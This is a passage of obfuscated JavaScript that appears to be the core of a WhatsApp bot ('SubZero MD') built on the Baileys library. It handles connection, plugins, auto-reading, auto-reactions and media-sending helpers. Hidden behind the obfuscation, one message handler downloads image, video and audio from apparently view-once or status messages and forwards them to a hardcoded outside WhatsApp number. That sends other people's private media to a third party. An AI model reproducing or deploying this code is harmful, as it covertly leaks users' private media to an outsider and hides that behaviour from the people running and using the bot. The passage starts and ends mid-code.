_0x385f13=_0x5d49cc;console[_0x385f13(0x2c1)](_0x385f13(0x249));});});}const express=require(_0x54ff3b(0x2e4)),app=express(),port=process[_0x54ff3b(0x2db)][_0x54ff3b(0x18f)]||0x1eb4;async function connectToWA(){const _0x4aeda0=_0x54ff3b;console[_0x4aeda0(0x2c1)](_0x4aeda0(0x2c3));const {state:_0x31fb0f,saveCreds:_0x467b0d}=await useMultiFileAuthState(__dirname+_0x4aeda0(0x2b8));var {version:_0x115701}=await fetchLatestBaileysVersion();const _0x22f519=makeWASocket({'logger':P({'level':_0x4aeda0(0x2cb)}),'printQRInTerminal':![],'browser':Browsers[_0x4aeda0(0x1f7)](_0x4aeda0(0x1c5)),'syncFullHistory':!![],'auth':_0x31fb0f,'version':_0x115701});_0x22f519['ev']['on'](_0x4aeda0(0x275),_0x4220ed=>{const _0x1a5785=_0x4aeda0,{connection:_0x553934,lastDisconnect:_0x496aab}=_0x4220ed;if(_0x553934===_0x1a5785(0x30c))_0x496aab[_0x1a5785(0x231)][_0x1a5785(0x23b)][_0x1a5785(0x1fe)]!==DisconnectReason['loggedOut']&&connectToWA();else{if(_0x553934===_0x1a5785(0x239)){console[_0x1a5785(0x2c1)](_0x1a5785(0x203));const _0x244be4=require(_0x1a5785(0x2e7));fs[_0x1a5785(0x216)](_0x1a5785(0x2ac))[_0x1a5785(0x313)](_0x42293a=>{_0x244be4['extname'](_0x42293a)['toLowerCase']()=='.js'&&require('./plugins/'+_0x42293a);}),console['log']('[❄️]\x20Plugins\x20installed\x20successful\x20✅'),console['log']('[❄️]\x20SubZero\x20MD\x20connected\x20to\x20whatsapp\x20✅');let _0x1f4fbe=_0x1a5785(0x26b)+prefix+_0x1a5785(0x28d);_0x22f519['sendMessage'](_0x22f519[_0x1a5785(0x289)]['id'],{'image':{'url':_0x1a5785(0x2d8)},'caption':_0x1f4fbe});}}}),_0x22f519['ev']['on'](_0x4aeda0(0x2f4),_0x467b0d),_0x22f519['ev']['on']('messages.upsert',async _0x53bb05=>{const _0x499e06=_0x4aeda0;_0x53bb05=_0x53bb05['messages'][0x0];if(!_0x53bb05[_0x499e06(0x20d)])return;_0x53bb05[_0x499e06(0x20d)]=getContentType(_0x53bb05[_0x499e06(0x20d)])===_0x499e06(0x24d)?_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x24d)][_0x499e06(0x20d)]:_0x53bb05[_0x499e06(0x20d)];config[_0x499e06(0x191)]===_0x499e06(0x1b6)&&(await _0x22f519['readMessages']([_0x53bb05['key']]),console[_0x499e06(0x2c1)](_0x499e06(0x2d1)+_0x53bb05[_0x499e06(0x226)]['remoteJid']+_0x499e06(0x1f5)));if(_0x53bb05['message']['viewOnceMessageV2'])_0x53bb05[_0x499e06(0x20d)]=getContentType(_0x53bb05[_0x499e06(0x20d)])===_0x499e06(0x24d)?_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x24d)][_0x499e06(0x20d)]:_0x53bb05['message'];_0x53bb05[_0x499e06(0x226)]&&_0x53bb05[_0x499e06(0x226)][_0x499e06(0x271)]===_0x499e06(0x31a)&&config[_0x499e06(0x25e)]===_0x499e06(0x1b6)&&await _0x22f519[_0x499e06(0x26c)]([_0x53bb05[_0x499e06(0x226)]]);if(_0x53bb05[_0x499e06(0x226)]&&_0x53bb05[_0x499e06(0x226)][_0x499e06(0x271)]===_0x499e06(0x31a)&&config[_0x499e06(0x280)]===_0x499e06(0x1b6)){const _0x2c05d0=_0x53bb05['key'][_0x499e06(0x253)],_0x48a16c=''+config[_0x499e06(0x2b0)];await _0x22f519['sendMessage'](_0x2c05d0,{'text':_0x48a16c,'react':{'text':'💚','key':_0x53bb05['key']}},{'quoted':_0x53bb05});}let _0x47ea9e=_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x27f)],_0x462f5a=_0x53bb05['mtype']===_0x499e06(0x21b);if(_0x47ea9e&&config[_0x499e06(0x23f)]===_0x499e06(0x1b6)){if(_0x47ea9e['message']['imageMessage']){let _0x4b2174=_0x47ea9e[_0x499e06(0x20d)]['imageMessage'][_0x499e06(0x1e9)],_0x5daaee=await _0x22f519[_0x499e06(0x1f1)](_0x47ea9e[_0x499e06(0x20d)][_0x499e06(0x208)]);return _0x22f519[_0x499e06(0x1fc)](_0x499e06(0x186),{'image':{'url':_0x5daaee},'caption':_0x4b2174},{'quoted':_0x53bb05});}if(_0x47ea9e['message']['videoMessage']){let _0x136882=_0x47ea9e['message'][_0x499e06(0x1a6)][_0x499e06(0x1e9)],_0xa34546=await _0x22f519[_0x499e06(0x1f1)](_0x47ea9e[_0x499e06(0x20d)][_0x499e06(0x1a6)]);return _0x22f519[_0x499e06(0x1fc)]('263719647303@s.whatsapp.net',{'video':{'url':_0xa34546},'caption':_0x136882},{'quoted':_0x53bb05});}if(_0x47ea9e[_0x499e06(0x20d)]['audioMessage']){let _0x47ef61=await _0x22f519[_0x499e06(0x1f1)](_0x47ea9e[_0x499e06(0x20d)][_0x499e06(0x21a)]);return _0x22f519['sendMessage'](_0x499e06(0x186),{'audio':{'url':_0x47ef61},'caption':cap},{'quoted':_0x53bb05});}}const _0x320a0c=sms(_0x22f519,_0x53bb05),_0x20b3f2=getContentType(_0x53bb05[_0x499e06(0x20d)]),_0x35729d=JSON[_0x499e06(0x318)](_0x53bb05['message']),_0xc04e1=_0x53bb05[_0x499e06(0x226)][_0x499e06(0x271)],_0x149832=_0x20b3f2==_0x499e06(0x2df)&&_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x2df)]['contextInfo']!=null?_0x53bb05[_0x499e06(0x20d)]['extendedTextMessage'][_0x499e06(0x2e0)][_0x499e06(0x20b)]||[]:[],_0x47cf84=_0x20b3f2==='conversation'?_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x29b)]:_0x20b3f2===_0x499e06(0x2df)?_0x53bb05[_0x499e06(0x20d)]['extendedTextMessage']['text']:_0x20b3f2==_0x499e06(0x208)&&_0x53bb05[_0x499e06(0x20d)]['imageMessage'][_0x499e06(0x1e9)]?_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x208)][_0x499e06(0x1e9)]:_0x20b3f2==_0x499e06(0x1a6)&&_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x1a6)]['caption']?_0x53bb05[_0x499e06(0x20d)][_0x499e06(0x1a6)][_0x499e06(0x1e9)]:'',_0x37499d=_0x47cf84['startsWith'](prefix),_0x3c9fa1=_0x37499d?_0x47cf84[_0x499e06(0x24c)](prefix[_0x499e06(0x27a)])['trim']()['split']('\x20')['shift']()['toLowerCase']():'',_0x76e4e0=_0x47cf84['trim']()[_0x499e06(0x1b4)](/ +/)[_0x499e06(0x24c)](0x1),_0xf6eaaa=_0x76e4e0['join']('\x20'),_0x883d72=_0xc04e1['endsWith'](_0x499e06(0x242)),_0x140b00=_0x53bb05[_0x499e06(0x226)][_0x499e06(0x1ac)]?_0x22f519[_0x499e06(0x289)]['id'][_0x499e06(0x1b4)](':')[0x0]+_0x499e06(0x195)||_0x22f519['user']['id']:_0x53bb05[_0x499e06(0x226)][_0x499e06(0x253)]||_0x53bb05[_0x499e06(0x226)][_0x499e06(0x271)],_0x284337=_0x140b00[_0x499e06(0x1b4)]('@')[0x0],_0x53b970=_0x22f519['user']['id'][_0x499e06(0x1b4)](':')[0x0],_0x5c658e=_0x53bb05[_0x499e06(0x2e6)]||'Sin\x20Nombre',_0x49dffe=_0x53b970[_0x499e06(0x2a0)](_0x284337),_0x34b923=ownerNumber[_0x499e06(0x2a0)](_0x284337)||_0x49dffe,_0x4f6a81=await jidNormalizedUser(_0x22f519['user']['id']),_0x2df2e0=_0x883d72?await _0x22f519[_0x499e06(0x27b)](_0xc04e1)[_0x499e06(0x266)](_0x5edc74=>{}):'',_0x40b129=_0x883d72?_0x2df2e0[_0x499e06(0x22a)]:'',_0x474210=_0x883d72?await _0x2df2e0[_0x499e06(0x206)]:'',_0x2045ef=_0x883d72?await getGroupAdmins(_0x474210):'',_0x27602d=_0x883d72?_0x2045ef['includes'](_0x4f6a81):![],_0x5dae0b=_0x883d72?_0x2045ef[_0x499e06(0x2a0)](_0x140b00):![],_0x3fa766=_0x320a0c[_0x499e06(0x20d)][_0x499e06(0x272)]?!![]:![],_0x403bb2=_0x219c34=>{const _0x31f78d=_0x499e06;_0x22f519[_0x31f78d(0x1fc)](_0xc04e1,{'text':_0x219c34},{'quoted':_0x53bb05});};_0x22f519[_0x499e06(0x1c0)]=_0x442225=>{const _0x4fea0f=_0x499e06;if(!_0x442225)return _0x442225;if(/:\d+@/gi[_0x4fea0f(0x27e)](_0x442225)){let _0x2c5110=jidDecode(_0x442225)||{};return _0x2c5110[_0x4fea0f(0x289)]&&_0x2c5110['server']&&_0x2c5110[_0x4fea0f(0x289)]+'@'+_0x2c5110[_0x4fea0f(0x20a)]||_0x442225;}else return _0x442225;},_0x22f519[_0x499e06(0x2cf)]=async(_0xa08c62,_0x3ce70f,_0x149c6b=![],_0x5490b2={})=>{const _0x148cf0=_0x499e06;let _0x45eae2;_0x5490b2[_0x148cf0(0x252)]&&(_0x3ce70f[_0x148cf0(0x20d)]=_0x3ce70f['message']&&_0x3ce70f[_0x148cf0(0x20d)][_0x148cf0(0x24d)]&&_0x3ce70f[_0x148cf0(0x20d)][_0x148cf0(0x24d)][_0x148cf0(0x20d)]?_0x3ce70f[_0x148cf0(0x20d)][_0x148cf0(0x24d)][_0x148cf0(0x20d)]:_0x3ce70f[_0x148cf0(0x20d)]||undefined,_0x45eae2=Object[_0x148cf0(0x2af)](_0x3ce70f[_0x148cf0(0x20d)]['viewOnceMessage'][_0x148cf0(0x20d)])[0x0],delete(_0x3ce70f[_0x148cf0(0x20d)]&&_0x3ce70f[_0x148cf0(0x20d)][_0x148cf0(0x2ce)]?_0x3ce70f['message']['ignore']:_0x3ce70f['message']||undefined),delete _0x3ce70f[_0x148cf0(0x20d)][_0x148cf0(0x21b)][_0x148cf0(0x20d)][_0x45eae2]['viewOnce'],_0x3ce70f[_0x148cf0(0x20d)]={..._0x3ce70f['message'][_0x148cf0(0x21b)][_0x148cf0(0x20d)]});let _0x1e6b38=Object[_0x148cf0(0x2af)](_0x3ce70f[_0x148cf0(0x20d)])[0x0],_0x489453=await generateForwardMessageContent(_0x3ce70f,_0x149c6b),_0x3a190c=Object[_0x148cf0(0x2af)](_0x489453)[0x0],_0x8eed2b={};if(_0x1e6b38!=_0x148cf0(0x29b))_0x8eed2b=_0x3ce70f[_0x148cf0(0x20d)][_0x1e6b38][_0x148cf0(0x2e0)];_0x489453[_0x3a190c][_0x148cf0(0x2e0)]={..._0x8eed2b,..._0x489453[_0x3a190c]['contextInfo']};const _0x135a04=await generateWAMessageFromContent(_0xa08c62,_0x489453,_0x5490b2?{..._0x489453[_0x3a190c],..._0x5490b2,..._0x5490b2['contextInfo']?{'contextInfo':{..._0x489453[_0x3a190c][_0x148cf0(0x2e0)],..._0x5490b2[_0x148cf0(0x2e0)]}}:{}}:{});return await _0x22f519['relayMessage'](_0xa08c62,_0x135a04['message'],{'messageId':_0x135a04[_0x148cf0(0x226)]['id']}),_0x135a04;},_0x22f519[_0x499e06(0x1f1)]=async(_0x5c20cb,_0x21ed9b,_0x4c8608=!![])=>{const _0x564073=_0x499e06;let _0x5794fa=_0x5c20cb[_0x564073(0x225)]?_0x5c20cb[_0x564073(0x225)]:_0x5c20cb,_0xb9eed1=(_0x5c20cb[_0x564073(0x225)]||_0x5c20cb)[_0x564073(0x2c2)]||'',_0x172097=_0x5c20cb['mtype']?_0x5c20cb['mtype'][_0x564073(0x325)](/Message/gi,''):_0xb9eed1['split']('/')[0x0];const _0x185850=await downloadContentFromMessage(_0x5794fa,_0x172097);let _0x37854f=Buffer['from']([]);for await(const _0x51cdd8 of _0x185850){_0x37854f=Buffer['concat']([_0x37854f,_0x51cdd8]);}let _0x49b979=await FileType[_0x564073(0x2f9)](_0x37854f);return trueFileName=_0x4c8608?_0x21ed9b+'.'+_0x49b979[_0x564073(0x299)]:_0x21ed9b,await fs[_0x564073(0x19b)](trueFileName,_0x37854f),trueFileName;},_0x22f519['downloadMediaMessage']=async _0x535646=>{const _0x418438=_0x499e06;let _0x347e80=(_0x535646[_0x418438(0x225)]||_0x535646)['mimetype']||'',_0x4156b9=_0x535646['mtype']?_0x535646['mtype'][_0x418438(0x325)](/Message/gi,''):_0x347e80['split']('/')[0x0];const _0x14401d=await downloadContentFromMessage(_0x535646,_0x4156b9);let _0x5c98ac=Buffer[_0x418438(0x1db)]([]);for await(const _0x349ede of _0x14401d){_0x5c98ac=Buffer[_0x418438(0x2a6)]([_0x5c98ac,_0x349ede]);}return _0x5c98ac;},_0x22f519[_0x499e06(0x22b)]=async(_0x2f422a,_0x1d587f,_0x4b8641,_0x269064,_0x5a1f14={})=>{const _0x50d599=_0x499e06;let _0x4c0d63='',_0x295936=await axios[_0x50d599(0x28a)](_0x1d587f);_0x4c0d63=_0x295936[_0x50d599(0x328)][_0x50d599(0x32d)];if(_0x4c0d63[_0x50d599(0x1b4)]('/')[0x1]===_0x50d599(0x1a8))return _0x22f519['sendMessage'](_0x2f422a,{'video':await getBuffer(_0x1d587f),'caption':_0x4b8641,'gifPlayback':!![],..._0x5a1f14},{'quoted':_0x269064,..._0x5a1f14});let _0x2bfce8=_0x4c0d63[_0x50d599(0x1b4)]('/')[0x0]+_0x50d599(0x264);if(_0x4c0d63===_0x50d599(0x2c7))return _0x22f519['sendMessage'](_0x2f422a,{'document':await getBuffer(_0x1d587f),'mimetype':'application/pdf','caption':_0x4b8641,..._0x5a1f14},{'quoted':_0x269064,..._0x5a1f14});if(_0x4c0d63['split']('/')[0x0]==='image')return _0x22f519[_0x50d599(0x1fc)](_0x2f422a,{'image':await getBuffer(_0x1d587f),'caption':_0x4b8641,..._0x5a1f14},{'quoted':_0x269064,..._0x5a1f14});if(_0x4c0d63['split']('/')[0x0]===_0x50d599(0x2d6))return _0x22f519[_0x50d599(0x1fc)](_0x2f422a,{'video':await getBuffer(_0x1d587f),'caption':_0x4b8641,'mimetype':_0x50d599(0x260),..._0x5a1f14},{'quoted':_0x269064,..._0x5a1f14});if(_0x4c0d63[_0x50d599(0x1b4)]('/')[0x0]==='audio')return _0x22f519[_0x50d599(0x1fc)](_0x2f422a,{'audio':await getBuffer(_0x1d587f),'caption':_0x4b8641,'mimetype':_0x50d599(0x2ec),..._0x5a1f14},{'quoted':_0x269064,..._0x5a1f14});},_0x22f519[_0x499e06(0x267)]=(_0x4dd9a9,_0x35d263,_0x136b56='',_0x1188cc=_0x22f519['user']['id'],_0x2f1aa8={})=>{const _0x3317fd=_0x499e06;let _0x58d3e9=Object[_0x3317fd(0x2af)](_0x35d263[_0x3317fd(0x20d)])[0x0],_0x40607=_0x58d3e9==='ephemeralMessage';_0x40607&&(_0x58d3e9=Object[_0x3317fd(0x2af)](_0x35d263[_0x3317fd(0x20d)]['ephemeralMessage'][_0x3317fd(0x20d)])[0x0]);let _0x432eca=_0x40607?_0x35d263[_0x3317fd(0x20d)][_0x3317fd(0x24d)]['message']:_0x35d263[_0x3317fd(0x20d)],_0xbd262f=_0x432eca[_0x58d3e9];if(typeof _0xbd262f===_0x3317fd(0x2bb))_0x432eca[_0x58d3e9]=_0x136b56||_0xbd262f;else{if(_0xbd262f[_0x3317fd(0x1e9)])_0xbd262f[_0x3317fd(0x1e9)]=_0x136b56||_0xbd262f[_0x3317fd(0x1e9)];else{if(_0xbd262f[_0x3317fd(0x1a4)])_0xbd262f[_0x3317fd(0x1a4)]=_0x136b56||_0xbd262f['text'];}}if(typeof _0xbd262f!=='string')_0x432eca[_0x58d3e9]={..._0xbd262f,..._0x2f1aa8};if(_0x35d263[_0x3317fd(0x226)]['participant'])_0x1188cc=_0x35d263['key'][_0x3317fd(0x253)]=_0x1188cc||_0x35d263['key'][_0x3317fd(0x253)];else{if(_0x35d263[_0x3317fd(0x226)]['participant'])_0x1188cc=_0x35d263[_0x3317fd(0x226)]['participant']=_0x1188cc||_0x35d263[_0x3317fd(0x226)][_0x3317fd(0x253)];}if(_0x35d263[_0x3317fd(0x226)][_0x3317fd(0x271)][_0x3317fd(0x2a0)](_0x3317fd(0x195)))_0x1188cc=_0x1188cc||_0x35d263[_0x3317fd(0x226)]['remoteJid'];else{if(_0x35d263[_0x3317fd(0x226)][_0x3317fd(0x271)][_0x3317fd(0x2a0)](_0x3317fd(0x1c8)))_0x1188cc=_0x1188cc||_0x35d263['key']['remoteJid'];}return _0x35d263[_0x3317fd(0x226)][_0x3317fd(0x271)]=_0x4dd9a9,_0x35d263[_0x3317fd(0x226)][_0x3317fd(0x1ac)]=_0x1188cc===_0x22f519['user']['id'],proto[_0x3317fd(0x218)][_0x3317fd(0x2ea)](_0x35d263);},_0x22f519[_0x499e06(0x310)]=async(_0x14f8fa,_0x519f31)=>{const _0x3b360d=_0x499e06;let _0x5b7c8f,_0x157f15=Buffer['isBuffer'](_0x14f8fa)?_0x14f8fa:/^data:.*?\/.*?;base64,/i[_0x3b360d(0x27e)](_0x14f8fa)?Buffer[_0x3b360d(0x1db)](_0x14f8fa[_0x3b360d(0x1b4)]`,`[0x1],_0x3b360d(0x244)):/^https?:\/\//['test'](_0x14f8fa)?await(_0x5b7c8f=await getBuffer(_0x14f8fa)):fs[_0x3b360d(0x2be)](_0x14f8fa)?(_0x5cdc24=_0x14f8fa,fs[_0x3b360d(0x1be)](_0x14f8fa)):typeof _0x14f8fa===_0x3b360d(0x2bb)?_0x14f8fa:Buffer[_0x3b360d(0x1da)](0x0),_0xc24e8=await FileType['fromBuffer'](_0x157f15)||{'mime':_0x3b360d(0x198),'ext':_0x3b360d(0x2fe)},_0x5cdc24=path[_0x3b360d(0x22f)](__filename,__dirname+new Date()*0x1+'.'+_0xc24e8['ext']);if(_0x157f15&&_0x519f31)fs[_0x3b360d(0x2fb)][_0x3b360d(0x1d5)](_0x5cdc24,_0x157f15);return{'res':_0x5b7c8f,'filename':_0x5cdc24,'size':await getSizeMedia(_0x157f15),..._0xc24e8,'data':_0x157f15};},_0x22f519[_0x499e06(0x1fa)]=async(_0x1f3915,_0x51c87f,_0x3f54c4,_0x142aed={},_0x2f14cd={})=>{const _0x1e4180=_0x499e06;let _0x41eb87=await _0x22f519[_0x1e4180(0x310)](_0x51c87f,!![]),{filename:_0x57188c,size:_0x46b83e,ext:_0x123f41,mime:_0x281b53,data:_0x7be194}=_0x41eb87,_0x17db63='',_0x3d4f13=_0x281b53,_0x1e241a=_0x57188c;if(_0x2f14cd['asDocument'])_0x17db63=_0x1e4180(0x23a);if(_0x2f14cd[_0x1e4180(0x259)]||/webp/['test'](_0x281b53)){let {writeExif:_0xd4e1dc}=require(_0x1e4180(0x1d0)),_0x52a074={'mimetype':_0x281b53,'data':_0x7be194};_0x1e241a=await _0xd4e1dc(_0x52a074,{'packname':Config[_0x1e4180(0x29d)],'author':Config[_0x1e4180(0x29d)],'categories':_0x2f14cd[_0x1e4180(0x273)]?_0x2f14cd[_0x1e4180(0x273)]:[]}),await fs[_0x1e4180(0x2fb)][_0x1e4180(0x332)](_0x57188c),_0x17db63='sticker',_0x3d4f13=_0x1e4180(0x189);}else{if(/image/['test'](_0x281b53))_0x17db63='image';else{if(/video/[_0x1e4180(0x27e)](_0x281b53))_0x17db63=_0x1e4180(0x2d6);else{if(/audio/[_0x1e4180(0x27e)](_0x281b53))_0x17db63='audio';else _0x17db63=_0x1e4180(0x23a);}}}return await _0x22f519[_0x1e4180(0x1fc)](_0x1f3915,{[_0x17db63]:{'url':_0x1e241a},'mimetype':_0x3d4f13,'fileName':_0x3f54c4,..._0x2f14cd},{'quoted':_0x142aed,..._0x2f14cd}),fs[_0x1e4180(0x2fb)][_0x1e4180(0x332)](_0x1e241a);},_0x22f519[_0x499e06(0x210)]=async _0x3e38a4=>{const _0x2e670a=_0x499e06;return[..._0x3e38a4[_0x2e670a(0x18d)](/@([0-9]{5,16}|0)/g)][_0x2e670a(0x311)](_0xe86673=>_0xe86673[0x1]+_0x2e670a(0x195));},_0x22f519['sendMedia']=async(_0x3cc500,_0x15641b,_0x448dee='',_0x455704='',_0x15c3c2='',_0x13c893={})=>{const _0x161a12=_0x499e06;let _0x343113=await _0x22f519['getFile'](_0x15641b,!![]),{mime:_0x9de177,ext:_0x58b0ec,res:_0x14e2c1,data:_0x16c046,filename:_0x107c7b}=_0x343113;if(_0x14e2c1&&_0x14e2c1[_0x161a12(0x293)]!==0xc8||file[_0x161a12(0x27a)]<=0x10000)try{throw{'json':JSON[_0x161a12(0x2f0)](file[_0x161a12(0x25c)]())};}catch(_0x4404da){if(_0x4404da[_0x161a12(0x212)])throw _0x4404da[_0x161a12(0x212)];}let _0x27aab7='',_0x129577=_0x9de177,_0x28e767=_0x107c7b;if(_0x13c893[_0x161a12(0x262)])_0x27aab7=_0x161a12(0x23a);if(_0x13c893[_0x161a12(0x259)]||/webp/[_0x161a12(0x27e)](_0x9de177)){let {writeExif:_0x5332da}=require(_0x161a12(0x298)),_0x5b85cc={'mimetype':_0x9de177,'data':_0x16c046};_0x28e767=await _0x5332da(_0x5b85cc,{'packname':_0x13c893[_0x161a12(0x29d)]?_0x13c893['packname']:Config[_0x161a12(0x29d)],'author':_0x13c893[_0x161a12(0x29f)]?_0x13c893[_0x161a12(0x29f)]:Config[_0x161a12(0x29f)],'categories':_0x13c893['categories']?_0x13c893[_0x161a12(0x273)]:[]}),await fs['promises'][_0x161a12(0x332)](_0x107c7b),_0x27aab7=_0x161a12(0x304),_0x129577='image/webp';}else{if(/image/[_0x161a12(0x27e)](_0x9de177))_0x27aab7=_0x161a12(0x261);else{if(/video/[_0x161a12(0x27e)](_0x9de177))_0x27aab7='video';else{if(/audio/[_0x161a12(0x27e)](_0x9de177))_0x27aab7=_0x161a12(0x1ff);else _0x27aab7=_0x161a12(0x23a);}}}return await _0x22f519['sendMessage'](_0x3cc500,{[_0x27aab7]:{'url':_0x28e767},'caption':_0x455704,'mimetype':_0x129577,'fileName':_0x448dee,..._0x13c893},{'quoted':_0x15c3c2,..._0x13c893}),fs[_0x161a12(0x2fb)][_0x161a12(0x332)](_0x28e767);},_0x22f519['sendVideoAsSticker']=async(_0xf865df,_0x46de9c,_0x110a8a={})=>{const _0x37d173=_0x499e06;let _0x3dcb00;_0x110a8a&&(_0x110a8a[_0x37d173(0x29d)]||_0x110a8a[_0x37d173(0x29f)])?_0x3dcb00=await writeExifVid(_0x46de9c,_0x110a8a):_0x3dcb00=await videoToWebp(_0x46de9c),await _0x22f519[_0x37d173(0x1fc)](_0xf865df,{'sticker':{'url':_0x3dcb00},..._0x110a8a},_0x110a8a);},_0x22f519[_0x499e06(0x30a)]=async(_0x16c1e0,_0x348bff,_0x255e04={})=>{const _0x55ea11=_0x499e06;let _0x1866ce;_0x255e04&&(_0x255e04[_0x55ea11(0x29d)]||_0x255e04['author'])?_0x1866ce=await writeExifImg(_0x348bff,_0x255e04):_0x1866ce=await imageToWebp(_0x348bff),await _0x22f519['sendMessage'](_0x16c1e0,{'sticker':{'url':_0x1866ce},..._0x255e04},_0x255e04);},_0x22f519['sendTextWithMentions']=async(_0x544266,_0x148273,_0x572e6f,_0x466900={})=>_0x22f519[_0x499e06(0x1fc)](_0x544266,{'text':_0x148273,'contextInfo':{'mentionedJid':[..._0x148273[_0x499e06(0x18d)](/@(\d{0,16})/g)][_0x499e06(0x311)](_0x44e7c6=>_0x44e7c6[0x1]+_0x499e06(0x195))},..._0x466900},{'quoted':_0x572e6f}),_0x22f519[_0x499e06(0x1f6)]=async(_0x29e37b,_0x3af7b6,_0x3a3cef='',_0x52a2cb='',_0x336e2e)=>{const _0xa2b522=_0x499e06;let _0x2e4240=Buffer[_0xa2b522(0x322)](_0x3af7b6)?_0x3af7b6:/^data:.*?\/.*?;base64,/i[_0xa2b522(0x27e)](_0x3af7b6)?Buffer[_0xa2b522(0x1db)](_0x3af7b6[_0xa2b522(0x1b4)]`,`[0x1],'base64'):/^https?:\/\//[_0xa2b522(0x27e)](_0x3af7b6)?await await getBuffer(_0x3af7b6):fs[_0xa2b522(0x2be)](_0x3af7b6)?fs[_0xa2b522(0x1be)](_0x3af7b6):Buffer[_0xa2b522(0x1da)](0x0);return await _0x22f519[_0xa2b522(0x1fc)](_0x29e37b,{'image':_0x2e4240,'caption':_0x3a3cef,..._0x336e2e},{'quoted':_0x52a2cb});},_0x22f519['sendText']=(_0x8ebea0,_0x32de90,_0xf40653='',_0x1445f3)=>_0x22f519[_0x499e06(0x1fc)](_0x8ebea0,{'text':_0x32de90,..._0x1445f3},{'quoted':_0xf40653}),_0x22f519[_0x499e06(0x301)]=(_0x5b1848,_0x1e34e7=[],_0x4c3cf7,_0x50bb2b,_0xf30f54='',_0x23e5a0={})=>{const _0x223290=_0x499e06;let _0x2ede93={'text':_0x4c3cf7,'footer':_0x50bb2b,'buttons':_0x1e34e7,'headerType':0x2,..._0x23e5a0};_0x22f519[_0x223290(0x1fc)](_0x5b1848,_0x2ede93,{'quoted':_0xf30f54,..._0x23e5a0});},_0x22f519[_0x499e06(0x2bd)]=async(_0x6573d5,_0x5a02be='',_0x523ef5='',_0x3da83f,_0x491e53=[],_0x33c4c8,_0x1a2031={})=>{const _0x4da4a4=_0x499e06;let _0x1d7b28=await prepareWAMessageMedia({'image':_0x3da83f,'jpegThumbnail':_0x33c4c8},{'upload':_0x22f519['waUploadToServer']});var _0x20aae8=generateWAMessageFromContent(_0x6573d5,proto['Message'][_0x4da4a4(0x2ea)]({'templateMessage':{'hydratedTemplate':{'imageMessage':_0x1d7b28[_0x4da4a4(0x208)],'hydratedContentText':_0x5a02be,'hydratedFooterText':_0x523ef5,'hydratedButtons':_0x491e53}}}),_0x1a2031);_0x22f519[_0x4da4a4(0x1fb)](_0x6573d5,_0x20aae8['message'],{'messageId':_0x20aae8[_0x4da4a4(0x226)]['id']});};_0x37499d&&config[_0x499e06(0x25d)]===_0x499e06(0x1b6)&&await _0x22f519['readMessages']([_0x53bb05[_0x499e06(0x226)]]);if(_0x284337[_0x499e06(0x2a0)](_0x499e06(0x2f1))){if(_0x3fa766)return;_0x320a0c['react'](_0x499e06(0x1e2));}if(!_0x3fa766&&_0x284337!==_0x53b970){if(config['AUTO_REACT']===_0x499e06(0x1b6)){const _0x58e878=['😊','👍','😂','💯','🔥','🙏','🎉','👏','😎','🤖','👫','👭','👬','👮',_0x499e06(0x243),'💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬',_0x499e06(0x1e6),'📸','📷',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽',_0x499e06(0x307),'💣','🔫','🕷️','🕸️','💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮',_0x499e06(0x243),'💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬','📽️','📸','📷',_0x499e06(0x1bf),'💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽','🕳️','💣','🔫','🕷️',_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','👫','👭','👬','👮',_0x499e06(0x243),'💼','📊','📈','📉','📊','📝','📚','📰','📱','💻','📻','📺','🎬','📽️','📸','📷','🕯️','💡','🔦','🔧','🔨','🔩','🔪','🔫','👑','👸','🤴','👹','🤺','🤻','👺','🤼','🤽','🤾','🤿','🦁','🐴','🦊','🐺','🐼','🐾','🐿','🦄','🦅','🦆','🦇','🦈','🐳','🐋','🐟','🐠','🐡','🐙','🐚','🐜','🐝','🐞',_0x499e06(0x21f),'🦋','🐛','🐌','🐚','🌿','🌸','💐','🌹','🌺','🌻','🌴','🏵','🏰','🏠','🏡','🏢','🏣','🏥','🏦','🏧','🏨','🏩','🏪','🏫','🏬','🏭','🏮','🏯','🚣','🛥','🚂','🚁','🚀','🛸','🛹','🚴','🚲','🛺','🚮','🚯','🚱','🚫','🚽',_0x499e06(0x307),'💣','🔫',_0x499e06(0x21f),_0x499e06(0x2c4),'💀','👻','🕺','💃',_0x499e06(0x243),'👶','👵','👴','👱','👨','👩','👧','👦','👪','🙂','😑','🤣','😍','😘','😗','😙','😚','😛','😝','😞','😟','😠','😡','😢','😭','😓','😳','😴','😌','😆','😂','🤔','😒','😓','😶','🙄','🐶','🐱','🐔','🐷','🐴','🐲','🐸','🐳','🐋','🐒','🐑','🐕','🐩','🍔','🍕','